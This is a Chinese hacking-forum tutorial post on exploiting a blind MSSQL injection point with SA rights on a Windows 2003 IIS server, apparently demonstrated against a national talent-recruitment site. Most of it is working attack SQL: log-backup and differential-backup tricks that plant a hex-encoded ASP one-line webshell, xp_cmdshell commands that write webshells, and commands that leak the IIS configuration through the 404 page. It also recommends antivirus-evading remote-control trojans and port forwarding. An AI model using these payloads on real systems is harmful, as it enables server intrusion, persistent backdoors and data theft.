找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2185|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
0 u' S# |2 _, y# L7 X
0 n: B2 w. C: t1 Q( z; ]+ W4 G! l, L1 D
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
, s$ X4 ?% ~/ G1 ?3 J
, n- o+ `* B- h                                                                 
7 g8 z5 b, k# C* c                                                                 * {2 [/ n1 a4 d5 m% R' X
                                                                  论坛: http://www.90team.net/. @& }1 z5 N/ o2 p6 E3 O) r. \  x
) v% {( _3 d, t' T
$ A: n5 B9 R* _; C

. ^8 b  R4 M- e% Q, a+ s: C+ @5 Y友情检测国家人才网, u5 O+ i0 L, {( ^  B% ]1 l

* G- I, J+ F. G/ A9 o, \6 Q2 b4 g+ n4 i6 q  T( l
内容:MSSQL注入SA权限不显错模式下的入侵
7 m. p7 E; c; p# q; ~3 F
1 M! X# |% \% C/ ~
8 J' B# G( U, ~3 O8 R9 U一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
, k+ b2 S/ X, V( I, S  e! f
1 c: s2 f4 t/ i& H. ^/ Y" ~我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
& s& P. f9 q/ E) d( S$ Y
8 [$ q1 X$ U, \. h- Z0 Q& E( T8 z# K& D5 _0 ~" o8 n1 Z
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。4 z: P6 T3 x3 s; H

" _3 c$ ?! }6 X3 o! N: @8 z& ?思路:: F7 g) o7 b8 p0 h$ a6 p

8 A5 E5 b1 E6 Q0 [$ V首先:  q0 c9 X0 d$ M( D3 q4 c  |/ C

9 H) J+ j# |5 }/ A7 b# q2 |通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
7 u1 Q* B+ _$ g) X& p
+ c" Y8 G2 X2 N# f- D. i. l1.日志备份获得Webshell  g" h$ j3 d# h3 C
0 i# l2 p* K* v6 `! e
2.数据库差异备份获得Webshell! ~5 E9 F+ n' j$ ?& g" H) {8 B
- C4 ~5 ?# P2 \! s' z
4.直接下载免杀远控木马。7 w; y1 u$ R" C- |: V2 H
$ P% F5 J. T2 q. B9 h8 `) |
5.直接下载LCX将服务器端口转发出来
; j$ \, P" W/ i5 g
/ O! _) i4 d0 v& ]0 r& p6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。. V9 ?* e' M5 T  y

9 Q+ W8 Q/ O0 g$ I/ N8 X* ?& P" Z5 p  T, a) g5 M$ ^" J) j. [
6 [1 m5 H0 z, E
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 7 `6 l" E4 z* g- R& e, A

( ]- B& u5 y: ?) O5 l我直接演示后面一个方法. G7 q/ K, h, `. p# b  M

0 C; I8 ]5 Y  }$ ]! K, j5 s: ?2 o( }* X' r$ j3 y( V$ d' M
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
- ~) l, j& |1 G; o# N0 J. |# ^0 W! o3 d+ @9 j

6 f( ]0 N7 q: n
- z0 ^9 [& M2 ?3 W
2 ^1 E( _. L! g) m3 z. P◆日志备份:
* d# G4 u( x$ o6 {) _" I. c0 i$ w3 F. [: p6 \% G; H

1 R! g) Y% y3 `8 B' V; m1. 进行初始备份
# [+ C# Q; j. U% i' y; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
: m5 {6 w: ?4 W$ G" e/ ]* R1 n$ l& [3 r9 m; ^* X
2. 插入数据
$ E) Q5 W  e5 F# B, F* a! m' X: G;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
' C( ^& |, c( Q7 K4 e
7 Z! M) z: }) `2 J3 Z5 s3 l0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>$ f9 l( l7 X7 \
  . g0 Y1 M. {8 T; X7 m, V
3. 备份并获得文件,删除临时表
' u6 p& }2 p$ c4 J/ B: Q6 [6 W;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--% a& n- r9 L9 z: B' F' ]& S$ j7 y5 f8 P, G

: u: z: g- N. u/ y; e' U8 a
3 g* {- a1 \# G" w) z
! A3 K9 M6 M6 v5 d3 W◆数据库差异备份7 K0 K8 o3 w8 R0 g5 F) g: O6 g2 E
0 o3 b8 w- U. s9 n+ [; _
(1. 进行差异备份准备工作% c2 J3 m4 B! e+ c! E$ b1 c
6 @9 a% T4 H. b: {
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--0 \: y, ]+ O* Y  d4 \: w5 [
3 o& v; b: g; A' T  s; E9 E
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码1 U/ d/ `5 W( m! Y

; A) X% I) G: t! ~( a+ F% h
4 C2 q; ?0 z7 F(2. 将数据写入到数据库
/ O7 M( J1 x4 |7 h# t0 X;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- " J+ e2 T/ |+ }1 D: C+ {
# ^  `# M- }, t+ a+ W1 M+ s# S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%># J) o; d( @) I6 g

' g( {% l' u% s7 Z, ?3. 备份数据库并清理临时文件' U7 r$ Z7 V. |1 `, A9 k, e. E7 Y8 v

  n0 g0 S# ^2 |) l0 R;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--, L: C4 l6 ^$ @; e& H' X9 h

! `4 v9 K( v  H: c0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
% Z" f- Q  U+ p- d2 p- a3 o: i1 o/ C6 ], ^

% ]5 p' D. M6 p( v# s3 |6 z- f8 w0 J3 ~- Y& ?
用^转义字符来写ASP(一句话木马)文件的方法:   2 ]/ r9 U' l1 @6 q
' a* a/ F( D# v! w
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--6 T" K% c9 X, o5 L; `

8 h6 F* \; \, b, Z2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
5 r) a( I7 @, W
5 T2 s/ q6 v" T! K) N. U$ I! l读取IIS配置信息获取web路径3 s9 h9 t; i# A8 l; z8 J1 `4 T- N

3 E4 R* r' K. B3 t1 A     
, j. l* |% Z  j- [7 ^1 H+ W     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--+ h8 v% O8 R  l- s+ v* A* K
" ^4 h9 ~. }6 X2 o
执行命令0 m/ u+ J/ h* c) O9 m- [
     . ?& n" k' p9 B5 c) u0 `% j
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--' R* E* a: ~/ q; M7 {6 A  c
* b9 b6 L: V$ W6 N

! e3 ?$ g+ U& s8 t& `7 p  |- @2 `3 l! |

& d2 H7 O$ p4 ~  i
, z/ y. K5 h' s2 C, q  {% a% n1 N9 L# D8 w

: |2 b2 i! S" M; v3 }$ n2 _0 W& K' ^5 a  G9 R0 x7 ?" O

* r, h6 Y- ?9 a7 @9 m# |# K# Z3 x0 s  U: h. h

! H) p) E- M& D+ d
6 x: E( P  l3 E( K; ^5 ]1 a
4 S( C8 W9 L7 {, Z' R! ?& \0 u* E! h) y% B2 r, R

/ L- U" h9 o8 b8 Q
+ x, U* l5 S, w3 N. T* k, p) ^" t& ]9 ~2 \9 r- q2 V8 t0 l

4 p! [0 j! i( |
! e% }7 D( I- p$ f% E
0 y5 f* k) b4 F* l  q9 g; o
; O2 O: o: ?9 z$ P8 d
- G: F. {8 C4 V. {; m: |' K" L4 S
, o/ d  K! G/ v7 P0 K3 `2 T, k! ^3 ?7 Q
. k* c; l% m& e( g

& S' d  E9 s; ?# ]+ h$ |" ]8 U; ]1 A; R. w$ m  m
# P, F1 c. {- G9 m" ^7 f

# A/ i. e' f: O8 X* m* M& y7 O. j! V$ X: |; z" {
( Q6 L7 X# i  K& E% q  f

8 q) R# ]( o- |+ ?8 [/ F2 [* ]! J

" ?/ R9 q/ C& w+ a6 E" ~6 {8 a, _- F
+ O$ e# j- O7 L+ Q; q# i

. Q6 B2 k) Y' ^4 H2 ?
! }9 Z2 H: b: \: ^0 K; {, w( G
7 ?. r  V2 ?7 i* F" t2 H
* n5 \9 B# C+ v( j8 B2 \. t8 u* _7 U0 T6 I. B
: x: s( I3 ^9 L7 V! v
  E- Q( {# Z0 L0 }
% a2 ^' P' f% y+ Z; K$ c

* b, a: T+ i. {+ l
4 I7 N* @3 Y: C% s9 M0 a9 J7 v) K) h, \* \3 D
6 O" |1 G5 _, c: @6 {% S7 |' q8 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表